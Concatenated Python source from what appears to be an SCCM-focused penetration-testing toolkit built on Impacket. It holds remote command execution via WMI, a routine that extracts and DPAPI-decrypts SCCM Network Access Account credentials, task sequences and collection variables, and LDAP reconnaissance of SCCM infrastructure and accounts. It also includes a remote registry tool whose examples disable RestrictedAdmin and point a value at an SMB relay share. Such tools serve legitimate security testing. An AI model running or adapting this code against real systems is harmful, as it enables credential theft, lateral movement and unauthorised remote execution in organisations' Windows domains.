            self.dcom = DCOMConnection(self.target, self.username, self.password, self.domain, self.lmhash, self.nthash,
                                       self.aesKey, oxidResolver=True, doKerberos=self.doKerberos, kdcHost=self.kdcHost)
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()
            logging.error(str(e))
            sys.exit(1)

    def connect_to_namespace(self, namespace) -> wmi.IWbemServices:
        try:
            logger.debug(f"[*] Connecting to WMI namespace: {namespace}")
            iInterface = self.dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
            iWbemServices = iWbemLevel1Login.NTLMLogin(namespace, NULL, NULL)
            iWbemLevel1Login.RemRelease()
            return iWbemServices
        except Exception as e:
            if type(e) is wmi.DCERPCSessionError and e.error_code == 0x8004100e:
                logger.info(f"[!] Unable to find the '{namespace}' namespace, this usually means there is no SCCM configuration on the machine.")

            self.dcom.disconnect()
            sys.exit(1)

    def exec(self, command):
        try:
            self.connect_to_dcom()
            logger.debug(f"[*] Executing command via WMI: {command}")
            iInterface = self.dcom.CoCreateInstanceEx(
                wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
            self.iWbemServices = iWbemLevel1Login.NTLMLogin(
                '//./root/cimv2', NULL, NULL)
            iWbemLevel1Login.RemRelease()
            self.win32Process, _ = self.iWbemServices.GetObject('Win32_Process')
            self.win32Process.Create(command, "C:\\", None)
            self.iWbemServices.disconnect()
            self.dcom.disconnect()
        except (Exception, KeyboardInterrupt) as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()
            logging.error(str(e))
            self.dcom.disconnect()
            sys.stdout.flush()
            sys.exit(1)
        logger.debug("[*] WMI Command Execution Finished!")

    def query(self, namespace, query) -> wmi.IEnumWbemClassObject:
           
        try:
            logger.debug(f"[*] Querying WMI Namespace: {namespace}")
            iInterface = self.dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
            iWbemServices = iWbemLevel1Login.NTLMLogin(namespace, NULL, NULL)
            iWbemLevel1Login.RemRelease()
            iEnum = iWbemServices.ExecQuery(query)
            return iEnum

        except Exception as e:
            if type(e) is wmi.DCERPCSessionError and e.error_code == 0x8004100e:
                logger.info("[!] WMI namespace not found")
            try:
                self.dcom.disconnect()
            except:
                pass
    
    def disconnect(self):
        logger.debug(f"[*] Closing DCOM connection to {self.target}")
        try:
            if self.dcom:
                self.dcom.disconnect()
        except KeyError as e:
            logger.error(f"Failed to disconnect DCOM connection: {e}")

    def parseReply(self, iEnum):

        regex = r"<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>"

        while True:
            try:
                pEnum = iEnum.Next(0xffffffff,1)[0]
                record = pEnum.getProperties()

                if 'NetworkAccessUsername' in record and 'NetworkAccessPassword' in record:
                    
                    if self.found_naa_credentials is False:
                        self.found_naa_credentials = True
                        logger.info("[+] Found NAA credentials")

                    unparsed_network_access_username = record.get('NetworkAccessUsername', {}).get('value', None)
                    unparsed_network_access_password = record.get('NetworkAccessPassword', {}).get('value', None)
                    username_decrypted  = self.dpapi.decrypt_blob(unhexlify(re.match(regex, unparsed_network_access_username).group(1))[4:])
                    password_decrypted  = self.dpapi.decrypt_blob(unhexlify(re.match(regex, unparsed_network_access_password).group(1))[4:])
                    SCCMSecret("NAA", username_decrypted, password_decrypted).dump(self.logs_dir)

                if 'TS_Sequence' in record:

                    if self.found_task_sequence is False:
                        self.found_task_sequence = True
                        logger.info("[+] Found Task Sequence")
                
                    unparsed_task_sequence = record.get('TS_Sequence', {}).get('value', None)
                    task_sequence_decrypted = self.dpapi.decrypt_blob(unhexlify(re.match(regex, unparsed_task_sequence).group(1))[4:])
                    SCCMSecret("Task Sequence", None, task_sequence_decrypted).dump()

                if 'Name' in record and 'Value' in record:

                    if self.found_collection_variables is False:
                        self.found_collection_variables = True
                        logger.info("[+] Found Collection Variables")

                    collection_name = record.get('Name', {}).get('value', None)
                    unparsed_collection_value = record.get('Value', {}).get('value', None)
                    collection_value_decrypted = self.dpapi.decrypt_blob(unhexlify(re.match(regex, unparsed_collection_value).group(1))[4:])
                    SCCMSecret("Collection Variable", collection_name, collection_value_decrypted).dump()

            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback
                    traceback.print_exc()
                if str(e).find('S_FALSE') < 0:
                    raise
                else:
                    break

        iEnum.RemRelease()

        return



from getpass import getpass
from ldap3.protocol.formatters.formatters import format_sid
from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
from ldap3.utils.conv import escape_filter_chars
from lib.ldap import init_ldap_session, get_dn
from lib.logger import logger
from tabulate import tabulate
import json
import ldap3
import os
import pandas as dp
import sqlite3


class DACLPARSE:

    def __init__(self):
        self.security_descriptor = SR_SECURITY_DESCRIPTOR()

    @property
    def dacl(self):
        return self.security_descriptor["Dacl"]
    
    @property
    def owner_sid(self):
        return self.security_descriptor['OwnerSid'] 

class DATABASE:

    def __init__(self, logs_dir=None):
        self.database = f"{logs_dir}/db/find.db"
        self.conn = sqlite3.connect(self.database, check_same_thread=False)

    def run(self):
        db_ready = self.validate_tables()
        if db_ready:
            logger.debug("[*] Database ready.")
            return True
        
    def validate_tables(self):
        table_names = ["CAS", "SiteServers", "ManagementPoints", "SiteDatabases", "DistributionPoints", "Users", "Groups", "Computers", "Creds"]
        try:
            for table_name in table_names:
                validated = self.conn.execute(f'''select name FROM sqlite_master WHERE type=\'table\' and name =\'{table_name}\'
                ''').fetchall()
                if len(validated) == 0:
                    self.build_tables()
            return True
        except Exception as e:
            logger.info("[-] Something went wrong creating tables.")
            logger.info(f"[-] {e}")
            exit()

    def build_tables(self):
        try:
            self.conn.execute('''CREATE TABLE CAS(SiteCode)''')
            self.conn.execute('''CREATE TABLE SiteServers(Hostname, SiteCode, CAS, SigningStatus, SiteServer, SMSProvider, Config, MSSQL)''')
            self.conn.execute('''CREATE TABLE ManagementPoints(Hostname, SiteCode, SigningStatus)''')
            self.conn.execute('''CREATE TABLE SiteDatabases(Hostname, MSSQL)''')
            self.conn.execute('''CREATE TABLE PXEDistributionPoints(Hostname, SigningStatus, SCCM, WDS)''')
            self.conn.execute('''CREATE TABLE Users(cn, name, sAMAAccontName, servicePrincipalName, description)''')
            self.conn.execute('''CREATE TABLE Groups(cn, name, sAMAAccontName, member, description)''')
            self.conn.execute('''CREATE TABLE Computers(Hostname, SiteCode, SigningStatus, SiteServer, ManagementPoint, DistributionPoint, SMSProvider, WSUS, MSSQL)''')
            self.conn.execute('''CREATE TABLE Creds(Username, Password, Source)''')
        except Exception as e:
            pass
        finally:
            return True
    
    def show_table(self, table_name):
        try:
            tb = dp.read_sql(f'select * from {table_name} COLLATE NOCASE', self.conn)
            logger.info((tabulate(tb, showindex=False, headers=tb.columns, tablefmt='grid')))
        except Exception as e:
            logger.info(e)


class SCCMHUNTER:
    
    def __init__(self, username=None, password=None, domain=None, target_dom=None,
                dc_ip=None, resolve=False, ldaps=False, kerberos=False, no_pass=False, hashes=None,
                aes=None, channel_binding=False, signing=False, debug=False, logs_dir = None, all_computers=False):
        self.username = username
        self.password= password
        self.domain = domain
        self.target_dom = target_dom
        self.dc_ip = dc_ip
        self.resolve = resolve
        self.ldaps = ldaps
        self.kerberos = kerberos
        self.no_pass = no_pass
        self.hashes=hashes
        self.aes = aes
        self.debug = debug
        self.channel_binding = channel_binding
        self.signing = signing
        self.ldap_session = None
        self.search_base = None
        self.logs_dir = logs_dir
        self.controls = ldap3.protocol.microsoft.security_descriptor_control(sdflags=0x07)
        self.database = f"{logs_dir}/db/find.db"
        if os.path.exists(self.database):
            os.remove(self.database)
        self.conn = sqlite3.connect(self.database, check_same_thread=False)
        self.resolved_sids = []
        self.site_codes= []
        self.mp_sitecodes = []
        self.all_computers = all_computers

    def run(self):
        db = DATABASE(self.logs_dir)  #make sure the DB is built
        db.run()
        if not self.ldap_session:     #bind to ldap
            self.ldapsession()        #set search base to query
        if self.target_dom:
            self.search_base = get_dn(self.target_dom)
            logger.debug(f'[LDAP] Target domain override: {self.target_dom} -> search_base={self.search_base}')
        else:
            self.search_base = get_dn(self.domain)
            logger.debug(f'[LDAP] Using auth domain for search: {self.domain} -> search_base={self.search_base}')
        self.check_schema()           #check for AD extension info
        self.check_dps()              #check for potential DPs
        self.check_strings()          #if they're using DNS only: thoughts and prayers
        if self.all_computers:
            self.check_all_computers()
        if self.debug:
            self.results()
        self.conn.close()

    def check_schema(self):
        # Query the ACL Of the System Management container for FULL CONTROL permissions. This container
        # is created during optional extension of the Active Directory schema to allow site servers to publish 
        # to LDAP.
        logger.info(f'[*] Checking for System Management Container.')
        try:
            self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                        search_filter=f"(distinguishedName=CN=System Management,CN=System,{self.search_base})", 
                                                        attributes="nTSecurityDescriptor", 
                                                        controls=self.controls,
                                                        paged_size=500, 
                                                        generator=False)
            #parse DACL
            if self.ldap_session.entries:
                for entry in self.ldap_session.entries:
                    logger.info("[+] Found System Management Container. Parsing DACL.")
                    json_entry = json.loads(entry.entry_to_json())
                    attributes = json_entry['attributes'].keys()
                    dacl = DACLPARSE()
                    for attr in attributes:
                        secdesc = (entry[attr].value)
                        dacl.security_descriptor.fromString(secdesc)
                self.ace_parser(dacl)
            #save results to DB
            if self.resolved_sids:
                cursor = self.conn.cursor()
                for result in set(self.resolved_sids):
                    cursor.execute(f'''insert into SiteServers (Hostname, SiteCode, CAS, SigningStatus, SiteServer, Config, MSSQL) values (?,?,?,?,?,?,?)''',
                                (result, '', '', '', 'True', '', ''))
                    self.add_computer_to_db(result) 
                    self.conn.commit()
                cursor.execute('''SELECT COUNT (Hostname) FROM SiteServers''')
                count = cursor.fetchone()[0]
                logger.info(f'[+] Found {count} computers with Full Control ACE')
                cursor.close()
                #since container was found, check for management points
                self.check_mps()
            else:
                logger.info("[-] System Management Container not found.")
        except ldap3.core.exceptions.LDAPAttributeError as e:
            logger.info("[-] Did not find System Management Container")
            return
        except Exception as e:
            raise e

                    
                    
    def check_sites(self):
        try:
            self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                search_filter="(objectclass=mssmssite)", 
                                                attributes="mSSMSSiteCode", 
                                                controls=self.controls,
                                                paged_size=500, 
                                                generator=False)
            if self.ldap_session.entries:
                for entry in self.ldap_session.entries:
                    sitecode = entry['msSMSSiteCode']
                    self.site_codes.append(sitecode)
                cas = [item for item in self.site_codes if item not in self.mp_sitecodes]
                if cas:
                    for sitecode in cas:
                        cursor = self.conn.cursor()
                        cursor.execute(f'''insert into CAS (SiteCode) values (?)''', (sitecode))

                
        except ldap3.core.exceptions.LDAPAttributeError as e:
            logger.info("[-] Did not find mSMSSite objectclass")
            return
        except Exception as e:
            logger.info(e)

    

    def check_mps(self):
        # Now query for the mssmsmanagementpoint object class. If schema exists there should be at least one.
        # Add to the site servers array // this might be redundant if we're querying for them specifically
        logger.info(f'[*] Querying LDAP for published Sites and Management Points')
        cursor = self.conn.cursor()
        try:
            self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                        "(objectclass=mssmsmanagementpoint)", 
                                                        attributes="*", 
                                                        controls=self.controls, 
                                                        paged_size=500, 
                                                        generator=False)  
            if self.ldap_session.entries:
                logger.info(f"[+] Found {len(self.ldap_session.entries)} Management Points in LDAP.")
                for entry in self.ldap_session.entries:
                    try: 
                        hostname =  str(entry['dNSHostname']).lower()
                        sitecode = str(entry['msSMSSitecode'])
                        self.mp_sitecodes.append(sitecode)
                        cursor.execute(f'''insert into ManagementPoints (Hostname, SiteCode, SigningStatus) values (?,?,?)''',
                                    (hostname, sitecode, ''))
                        if hostname:
                            self.add_computer_to_db(hostname) 
                        self.conn.commit()
                    except ldap3.core.exceptions.LDAPKeyError as e:
                        logger.debug(f"[-] {e}")
            cursor.close()
            self.check_sites()

        except ldap3.core.exceptions.LDAPObjectClassError as e:
            logger.info(f'[-] Could not find any Management Points published in LDAP')


    def check_dps(self):
        #query for PXE enabled distribution points that are using Windows Deployment Services
        #if the DP is using WDS a child intellimirror-scp class will be published under the computer object
        #find all cases, parse the DN, then resolve the DN's hostname
        logger.info(f'[*] Querying LDAP for potential PXE enabled distribution points')
        cursor = self.conn.cursor()
        potential_dps = []
        try:
            self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                        "(&(objectclass=connectionPoint)(netbootserver=*))", 
                                                        attributes="distinguishedName", 
                                                        controls=self.controls, 
                                                        paged_size=500, 
                                                        generator=False)  
            if self.ldap_session.entries:
                logger.info(f"[+] Found {len(self.ldap_session.entries)} potential Distribution Points in LDAP.")
                for entry in self.ldap_session.entries:
                    dn =  str(entry['distinguishedName'])
                    if dn:
                        trim = dn.find(",")
                        trimmed = dn[trim + 1:]
                        potential_dps.append(trimmed)

        except ldap3.core.exceptions.LDAPObjectClassError as e:
            logger.info(f'[-] Could not find any Distribution Points published in LDAP')
        if potential_dps:
            for dn in potential_dps:
                dn = escape_filter_chars(dn)
                try:
                    self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                                f"(distinguishedName={dn})", 
                                                                attributes="dNSHostName", 
                                                                controls=self.controls, 
                                                                paged_size=500, 
                                                                generator=False)  
                    if self.ldap_session.entries:
                        for entry in self.ldap_session.entries:
                            hostname =  str(entry['dNSHostname'])
                            cursor.execute(f'''insert into PXEDistributionPoints (Hostname, SigningStatus, SCCM, WDS) values (?,?,?,?)''',
                                (hostname, '', '' , ''))
                            if hostname:
                                self.add_computer_to_db(hostname)
                            self.conn.commit()
                    
                except ldap3.core.exceptions.LDAPObjectClassError as e:
                    logger.info(f'[-] Could not find any Distribution Points published in LDAP')
        cursor.close()

    def check_strings(self):
        #now search for anything related to "SCCM" 
        yeet = '(|(samaccountname=*sccm*)(samaccountname=*mecm*)(description=*sccm*)(description=*mecm*)(name=*sccm*)(name=*mecm*))'
        logger.info("[*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'")
        try:
            self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                        yeet, 
                                                        attributes="*", 
                                                        paged_size=500, 
                                                        generator=False)  
        except ldap3.core.exceptions.LDAPAttributeError as e:
            logger.info(f'Error: {str(e)}')
        except Exception as e:
            logger.info(f"Error {e}")
        
        if self.ldap_session.entries:
            logger.info(f"[+] Found {len(self.ldap_session.entries)} principals that contain the string 'SCCM' or 'MECM'.")
            for entry in self.ldap_session.entries:
                #TODO: should there be logic for OU members?
                try:
                    if 'sAMAccountType' in entry:
                        #add user to db
                        if (entry['sAMAccountType']) == 805306368:
                            self.add_user_to_db(entry)
                        #add computer to db
                        if (entry['sAMAccountType']) == 805306369:
                            hostname =  str(entry['dNSHostname'])
                            if hostname:
                                self.add_computer_to_db(hostname)
                        #add group to db and then resolve members
                        if (entry['sAMAccountType']) == 268435456:
                            self.add_group_to_db(entry)
                            if self.resolve:
                                dn = (entry['distinguishedname'])
                                results = self.recursive_resolution(dn)
                                for result in results:
                                    #add parsed results to DB
                                    if (result['sAMAccountType']) == 805306368:
                                        self.add_user_to_db(result)
                                    if (result['sAMAccountType']) == 805306369:
                                        hostname =  str(result['dNSHostname'])
                                        if hostname:
                                            self.add_computer_to_db(result)
                                    if (result['sAMAccountType']) == 268435456:
                                        self.add_group_to_db(result)
                except ldap3.core.exceptions.LDAPAttributeError as e:
                    logger.debug(f"[-] {e}")
                except ldap3.core.exceptions.LDAPKeyError as e:
                    logger.debug(f"[-] {e}")
        else:
            logger.info("[-] No results found.")

    def check_all_computers(self):
        # If user specifies the option, get every computer object via LDAP
        logger.info(f'[*] Querying LDAP for all computer objects')
        cursor = self.conn.cursor()
        try:
            self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                        "(&(objectCategory=computer))", 
                                                        attributes="dNSHostName", 
                                                        controls=self.controls, 
                                                        paged_size=500, 
                                                        generator=False)  
            if self.ldap_session.entries:
                logger.info(f"[+] Found {len(self.ldap_session.entries)} computers in LDAP.")
                for entry in self.ldap_session.entries:
                    hostname =  str(entry['dNSHostname'])
                    if hostname:
                        self.add_computer_to_db(hostname)
                    self.conn.commit()
            cursor.close()

        except ldap3.core.exceptions.LDAPObjectClassError as e:
            logger.info(f'[-] Could not find any computer objects in LDAP')            

    #add entries to database, check if attributes exists on entry, check if row already exists, add if not
    def add_group_to_db(self,entry):
        cursor = self.conn.cursor()
        cn = str(entry['cn']) if 'cn' in entry else ''
        name = str(entry['name']) if 'name' in entry else ''
        sam = str(entry['sAMAccountName']) if 'sAMAccountName' in entry else ''
        member = str(entry['member']).replace("['", "").replace("']", "\n").replace("', '", "\n") if 'member' in entry else ''
        description = str(entry['description']) if 'description' in entry else ''
        cursor.execute('''select * from Groups where name = ?''', (name,))
        exists = cursor.fetchone()
        if exists:
            logger.debug(f"[*] Skipping group that already exists: {name}")        
        if not exists:
            logger.debug(f"[+] Found group: {name}")
            cursor.execute('''insert into Groups (cn, name, sAMAAccontName, member, description) values (?,?,?,?,?)''', 
                        (cn, name,sam,member,description))
            self.conn.commit()
        return

    def add_user_to_db(self, entry):
        cursor = self.conn.cursor()
        cn = str(entry['cn']) if 'cn' in entry else ''
        name = str(entry['name']) if 'name' in entry else ''
        sam = str(entry['sAMAccountName']) if 'sAMAccountName' in entry else ''
        spn = str(entry['servicePrincipalName']).replace("['", "").replace("']", "\n").replace("', '", "\n") if 'servicePrincipalName' in entry else ''
        description = str(entry['description']) if 'description' in entry else ''
        cursor.execute('''select * from Users where name = ?''', (name,))
        exists = cursor.fetchone()
        if exists:
            logger.debug(f"[*] Skipping already known user: {name}")
        if not exists:
            logger.debug(f"[+] Found user: {name}")
            cursor.execute('''insert into Users (cn, name, sAMAAccontName, servicePrincipalName, description) values (?,?,?,?,?)''', 
                        (cn, name,sam,spn,description))
            self.conn.commit()
        return
    
    def add_computer_to_db(self, entry):
        cursor = self.conn.cursor()
        hostname = entry
        sitecode = ''
        signing = ''
        siteserver = ''
        mp = ''
        dp = ''
        wsus = ''
        mssql = ''
        cursor.execute('''select * from Computers where Hostname = ?''', (hostname,))
        exists = cursor.fetchone()
        if exists:
            logger.debug(f"[*] Skipping already known host: {hostname}")
        if not exists:
            logger.debug(f"[+] Found host: {hostname}")
            cursor.execute('''insert into Computers (Hostname, SiteCode, SigningStatus, SiteServer, ManagementPoint, DistributionPoint, WSUS, MSSQL) values (?,?,?,?,?,?,?,?)''', 
                        (hostname, sitecode, signing, siteserver, mp, dp, wsus, mssql))
            self.conn.commit()

        return

    #resolve all group members
    def recursive_resolution(self, dn):
        dn = dn
        search_filter = f"(memberOf:1.2.840.113556.1.4.1941:={dn})"
        try:
            self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                        search_filter, 
                                                        attributes="*", 
                                                        paged_size=500, 
                                                        generator=False)  
        except ldap3.core.exceptions.LDAPAttributeError as e:
            logger.info("Something went wrong. Use -debug to print a stack trace.")
            logger.debug(f'Error: {str(e)}')
        except Exception as e:
            logger.info("Something went wrong. Use -debug to print a stack trace.")
            logger.debug(f"[-] {e}")
        
        results = self.ldap_session.entries
        return results

    def results(self):
        tb_ss = dp.read_sql("SELECT * FROM SiteServers WHERE Hostname IS NOT 'Unknown' ", self.conn)
        tb_db = dp.read_sql("SELECT * FROM SiteDatabases WHERE Hostname IS NOT 'Unknown' ", self.conn)
        tb_mp = dp.read_sql("SELECT * FROM ManagementPoints WHERE Hostname IS NOT 'Unknown' ", self.conn)
        tb_dp = dp.read_sql("SELECT * FROM PXEDistributionPoints WHERE Hostname IS NOT 'Unknown' ", self.conn)
        tb_c = dp.read_sql("SELECT * FROM Computers WHERE Hostname IS NOT 'Unknown' ", self.conn)
        tb_u = dp.read_sql("SELECT * FROM Users", self.conn)
        tb_g = dp.read_sql("SELECT * FROM Groups", self.conn)
        logger.info("Site Servers Table")
        logger.info(tabulate(tb_ss, showindex=False, headers=tb_ss.columns, tablefmt='grid'))
        logger.info("Potential Site Databases")
        logger.info(tabulate(tb_db, showindex=False, headers=tb_db.columns, tablefmt='grid'))
        logger.info("Management Points Table")
        logger.info(tabulate(tb_mp, showindex=False, headers=tb_mp.columns, tablefmt='grid'))
        logger.info("Potential PXE Distribution Points")
        logger.info(tabulate(tb_dp, showindex=False, headers=tb_dp.columns, tablefmt='grid'))
        logger.info('Computers Table')
        logger.info(tabulate(tb_c, showindex=False, headers=tb_c.columns, tablefmt='grid'))
        logger.info("Users Table")
        logger.info(tabulate(tb_u, showindex=False, headers=tb_u.columns, tablefmt='grid'))
        logger.info("Groups Table")
        logger.info(tabulate(tb_g, showindex=False, headers=tb_g.columns, tablefmt='grid'))

    def ldapsession(self):
        lmhash = ""
        nthash = ""
        if self.hashes:
            lmhash, nthash = self.hashes.split(':')
        if not (self.password or self.hashes or self.aes or self.no_pass):
                self.password = getpass("Password:")
        try:
            ldap_server, self.ldap_session = init_ldap_session(domain=self.domain, username=self.username, password=self.password, lmhash=lmhash,
                                                            nthash=nthash, kerberos=self.kerberos, domain_controller=self.dc_ip,
                                                            aesKey=self.aes, hashes=self.hashes, ldaps=self.ldaps, channel_binding=self.channel_binding, signing=self.signing)
            logger.debug(f'[+] Bind successful {ldap_server}')
        except ldap3.core.exceptions.LDAPSocketOpenError as e: 
            if 'invalid server address' in str(e):
                logger.info(f'Invalid server address - {self.domain}')
            else:
                logger.info('Error connecting to LDAP server')
                print()
                logger.info(e)
            exit()
        except ldap3.core.exceptions.LDAPBindError as e:
            logger.info(f'Error: {str(e)}')
            exit()
        except ldap3.core.exceptions.LDAPInvalidValueError as e:
            logger.info('Channel binding only available over LDAPS')
            exit()

    def member_sid_resolver(self, member):
        sid = []
        member = escape_filter_chars(member)
        search_filter = f"(distinguishedName={member})"
        self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                    search_filter, 
                                                    attributes="*", 
                                                    paged_size=500, 
                                                    generator=False)
        for entry in self.ldap_session.entries:
            json_entry = json.loads(entry.entry_to_json())
            attributes = json_entry['attributes'].keys()
            for attr in attributes:
                if attr == "objectSid":
                    sid.append(format_sid(entry[attr].value))
        self.sid_resolver(sid)


    def sid_resolver(self, sids):
        for sid in sids:
            search_filter = "(objectSid={})".format(sid)
            self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                        search_filter,
                                                        attributes="*",
                                                        paged_size=500, 
                                                        generator=False)
            try:
                for entry in self.ldap_session.entries:

                    json_entry = json.loads(entry.entry_to_json())
                    attributes = json_entry['attributes'].keys()
                    for attr in attributes:
                        if (entry['sAMAccountType']) == "268435456" or 268435456:
                            if attr == 'member':
                                if type(entry[attr].value) is list:
                                    for member in entry['member'].value:
                                        self.member_sid_resolver(member)
                                if type(entry[attr].value) is str:
                                    member = entry[attr].value
                                    self.member_sid_resolver(member)

                        if entry['sAMAccountType'] == "805306369" or 805306369:
                            if attr == 'dNSHostName':
                                dnsname = entry['dNSHostName'].value  
                                self.resolved_sids.append(str(dnsname).lower())

            except ldap3.core.exceptions.LDAPKeyError as e:
                logger.debug(e)
            except Exception as e:
                logger.info(e)

    def ace_parser(self, descriptor):
        sids = []
        for ace in descriptor.dacl.aces:
            if ace["TypeName"] == "ACCESS_ALLOWED_ACE" or ace["TypeName"] == "ACCESS_ALLOWED_OBJECT_ACE":
                ace = ace["Ace"]
                sid = ace["Sid"].formatCanonical()
                mask = ace["Mask"]
                fullcontrol = 0xf01ff
                if mask.hasPriv(fullcontrol):
                    sids.append(sid)
        self.sid_resolver(sids)



#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies 
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   Remote registry manipulation tool.
#   The idea is to provide similar functionality as the REG.EXE Windows utility.
#
#   e.g:
#       ./reg.py Administrator:password@targetMachine query -keyName HKLM\\Software\\Microsoft\\WBEM -s
#       ./reg.py Administrator:password@targetMachine add -keyName HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa -v DisableRestrictedAdmin -vt REG_DWORD -vd 1
#       ./reg.py Administrator:password@targetMachine add -keyName HKLM\\SYSTEM\\CurrentControlSet\\Services\\NewService
#       ./reg.py Administrator:password@targetMachine add -keyName HKCR\\hlpfile\\DefaultIcon  -v '' -vd '\\SMBRelay\share'
#       ./reg.py Administrator:password@targetMachine delete -keyName HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa -v DisableRestrictedAdmin
#
# Author:
#   Manuel Porto (@manuporto)
#   Alberto Solino (@agsolino)
#
# Reference for:
#   [MS-RRP]
#

from __future__ import division
from __future__ import print_function
import argparse
import codecs
import logging
import sys
import time
import binascii
from struct import unpack

from impacket import version
from impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt
from impacket.examples import logger
from impacket.examples.utils import parse_target
from impacket.system_errors import ERROR_NO_MORE_ITEMS
from impacket.structure import hexdump
from impacket.smbconnection import SMBConnection, SessionError
from impacket.dcerpc.v5.dtypes import READ_CONTROL
from lib.logger import logger

class RemoteOperations:
    def __init__(self, smbConnection, doKerberos, kdcHost=None):
        self.__smbConnection = smbConnection
        self.__smbConnection.setTimeout(5 * 60)
        self.__serviceName = 'RemoteRegistry'
        self.__stringBindingWinReg = r'ncacn_np:445[\pipe\winreg]'
        self.__rrp = None
        self.__regHandle = None

        self.__doKerberos = doKerberos
        self.__kdcHost = kdcHost

        self.__disabled = False
        self.__shouldStop = False
        self.__started = False

        self.__stringBindingSvcCtl = r'ncacn_np:445[\pipe\svcctl]'
        self.__scmr = None



    def print_key_values(self, rpc, keyHandler):
        i = 0
        while True:
            try:
                ans4 = rrp.hBaseRegEnumValue(rpc, keyHandler, i)
                lp_value_name = ans4['lpValueNameOut'][:-1]
                if len(lp_value_name) == 0:
                    lp_value_name = '(Default)'
                lp_type = ans4['lpType']
                lp_data = b''.join(ans4['lpData'])
                print('\t' + lp_value_name + '\t' + self.__regValues.get(lp_type, 'KEY_NOT_FOUND') + '\t', end=' ')
                self.__parse_lp_data(lp_type, lp_data)
                i += 1
            except rrp.DCERPCSessionError as e:
                if e.get_error_code() == ERROR_NO_MORE_ITEMS:
                    break

    def strip_root_key(self, dce, keyName):
        # Let's strip the root key
        try:
            rootKey = keyName.split('\\')[0]
            subKey = '\\'.join(keyName.split('\\')[1:])
        except Exception:
            raise Exception('Error parsing keyName %s' % keyName)
        if rootKey.upper() == 'HKLM':
            ans = rrp.hOpenLocalMachine(dce)
        elif rootKey.upper() == 'HKCU':
            ans = rrp.hOpenCurrentUser(dce)
        elif rootKey.upper() == 'HKU':
            ans = rrp.hOpenUsers(dce)
        elif rootKey.upper() == 'HKCR':
            ans = rrp.hOpenClassesRoot(dce)
        else:
            raise Exception('Invalid root key %s ' % rootKey)
        hRootKey = ans['phKey']
        return hRootKey, subKey



    def triggerWinReg(self):
        # original idea from https://twitter.com/splinter_code/status/1715876413474025704
        tid = self.__smbConnection.connectTree('IPC$')
        try:
            self.__smbConnection.openFile(tid, r'\winreg', 0x12019f, creationOption=0x40, fileAttributes=0x80)
        except SessionError:
            # STATUS_PIPE_NOT_AVAILABLE error is expected
            pass
        # give remote registry time to start
        time.sleep(1)

    def getRRP(self):
        return self.__rrp

    def __connectSvcCtl(self):
        rpc = transport.DCERPCTransportFactory(self.__stringBindingSvcCtl)
        rpc.set_smb_connection(self.__smbConnection)
        self.__scmr = rpc.get_dce_rpc()
        self.__scmr.connect()
        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)

    def connectWinReg(self):
        rpc = transport.DCERPCTransportFactory(self.__stringBindingWinReg)
        rpc.set_smb_connection(self.__smbConnection)
        self.__rrp = rpc.get_dce_rpc()
        self.__rrp.connect()
        self.__rrp.bind(rrp.MSRPC_UUID_RRP)

    def __checkServiceStatus(self):
        # Open SC Manager
        ans = scmr.hROpenSCManagerW(self.__scmr)
        self.__scManagerHandle = ans['lpScHandle']
        # Now let's open the service
        ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__serviceName)
        self.__serviceHandle = ans['lpServiceHandle']
        # Let's check its status
        ans = scmr.hRQueryServiceStatus(self.__scmr, self.__serviceHandle)
        if ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_STOPPED:
            #('Service %s is in stopped state' % self.__serviceName)
            self.__shouldStop = True
            self.__started = False
        elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
            logger.debug('Service %s is already running' % self.__serviceName)
            self.__shouldStop = False
            self.__started = True
        else:
            raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])

        # Let's check its configuration if service is stopped, maybe it's disabled :s
        if self.__started is False:
            ans = scmr.hRQueryServiceConfigW(self.__scmr, self.__serviceHandle)
            if ans['lpServiceConfig']['dwStartType'] == 0x4:
                #('Service %s is disabled, enabling it' % self.__serviceName)
                self.__disabled = True
                scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType=0x3)
            #('Starting service %s' % self.__serviceName)
            scmr.hRStartServiceW(self.__scmr, self.__serviceHandle)
            time.sleep(1)

    def enableRegistry(self):
        self.__connectSvcCtl()
        self.__checkServiceStatus()
        self.connectWinReg()

    def __restore(self):
        # First of all stop the service if it was originally stopped
        if self.__shouldStop is True:
            #('Stopping service %s' % self.__serviceName)
            scmr.hRControlService(self.__scmr, self.__serviceHandle, scmr.SERVICE_CONTROL_STOP)
        if self.__disabled is True:
            #('Restoring the disabled state for service %s' % self.__serviceName)
            scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType=0x4)

